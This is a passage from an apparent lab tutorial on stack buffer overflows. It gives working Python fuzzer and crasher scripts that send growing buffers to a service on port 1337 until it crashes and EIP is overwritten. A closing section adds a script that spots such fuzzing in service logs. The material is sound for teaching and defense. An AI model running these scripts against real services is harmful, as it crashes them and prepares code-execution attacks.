Crashing the Application

In order to exploit the target application, we first need to crash it and confirm that we can overwrite the EIP with values we control.

Fuzzing the Application

This step can be skipped for some applications where the buffer size that causes the crash is already known.

Fuzzer.py

#!/usr/bin/env python3

import socket, time, sys

ip = "windows.box"

port = 1337
timeout = 5
prefix = "OVERFLOW10 "

# Start with 100 bytes of padding after the command prefix
string = prefix + "A" * 100

while True:
  try:
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
      s.settimeout(timeout)
      s.connect((ip, port))
      s.recv(1024)  # read the service banner
      print("Fuzzing with {} bytes".format(len(string) - len(prefix)))
      s.send(bytes(string, "latin-1"))
      s.recv(1024)  # a timeout here means the service stopped responding
  except:
    # No response within the timeout: the service most likely crashed
    print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix)))
    sys.exit(0)
  # Grow the buffer by 100 bytes per iteration
  string += 100 * "A"
  time.sleep(1)

Fuzzing

python3 fuzzer.py

The fuzzer tells us that the program crashed when 600 bytes were sent as the buffer. We also notice that the EIP has been overwritten with \x41 (the byte value of "A").

Crashing the Application

This step is used to verify the buffer size reported by the fuzzing process.

Crasher.py

#!/usr/bin/python
import socket

try:
    print ("\nSending evil buffer...")

    prefix = "OVERFLOW10 "
    # 600 bytes of padding: the size the fuzzer reported as the crash point
    buffer = prefix + "A" * 600

    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)

    s.connect(("windows.box", 1337))
    # Sockets take bytes, so encode the string (works on Python 2 and 3)
    s.send(buffer.encode("latin-1"))

    s.close()

    print ("\nDone!")

except socket.error:
    print ("\nCould not connect!")

Crashing

python crasher.py

Once Crasher.py is run, notice that the target application crashes and the EIP is overwritten with \x41. This confirms that 600 bytes is indeed the buffer size that causes the target application to crash.
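From the defender's side, the fuzzing run above leaves a very recognisable footprint: one client sending the same command with payload lengths that climb in a fixed stride until the service stops answering. The following script is an added example, not part of the original page, that detects that pattern over constructed service log lines; the log format and field names are assumed.

```python
#!/usr/bin/env python3
"""Flag incremental-length fuzzing of a command in a service log."""
import re
from collections import defaultdict

# Constructed sample log (assumed format): one line per request received.
SAMPLE_LOG = """\
2021-12-01T10:00:01 client=10.0.0.5 cmd=OVERFLOW10 len=100 status=ok
2021-12-01T10:00:02 client=10.0.0.5 cmd=OVERFLOW10 len=200 status=ok
2021-12-01T10:00:03 client=10.0.0.5 cmd=OVERFLOW10 len=300 status=ok
2021-12-01T10:00:04 client=10.0.0.5 cmd=OVERFLOW10 len=400 status=ok
2021-12-01T10:00:05 client=10.0.0.5 cmd=OVERFLOW10 len=500 status=ok
2021-12-01T10:00:06 client=10.0.0.5 cmd=OVERFLOW10 len=600 status=no_reply
2021-12-01T10:00:07 client=10.0.0.9 cmd=OVERFLOW10 len=12 status=ok
"""

LINE_RE = re.compile(r"client=(\S+) cmd=(\S+) len=(\d+) status=(\S+)")


def parse_log(text):
    """Group (length, status) pairs per (client, cmd), in log order."""
    seqs = defaultdict(list)
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            client, cmd, length, status = m.groups()
            seqs[(client, cmd)].append((int(length), status))
    return seqs


def find_fuzzing(seqs, min_steps=4):
    """Return (client, cmd, last_len, last_status) for every client whose
    payload lengths to one command grow by a constant positive stride for
    at least min_steps requests; last_status shows whether it ended in a
    non-responding service, i.e. a likely crash."""
    findings = []
    for (client, cmd), seq in seqs.items():
        if len(seq) < min_steps:
            continue
        strides = {b[0] - a[0] for a, b in zip(seq, seq[1:])}
        if len(strides) == 1 and next(iter(strides)) > 0:
            last_len, last_status = seq[-1]
            findings.append((client, cmd, last_len, last_status))
    return findings


if __name__ == "__main__":
    for f in find_fuzzing(parse_log(SAMPLE_LOG)):
        print("possible fuzzing: client=%s cmd=%s last_len=%d status=%s" % f)
```

The last reported length and a final `no_reply` status together point at the request size that took the service down, which is the same number the attacker's fuzzer prints.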

Last updated 3 years ago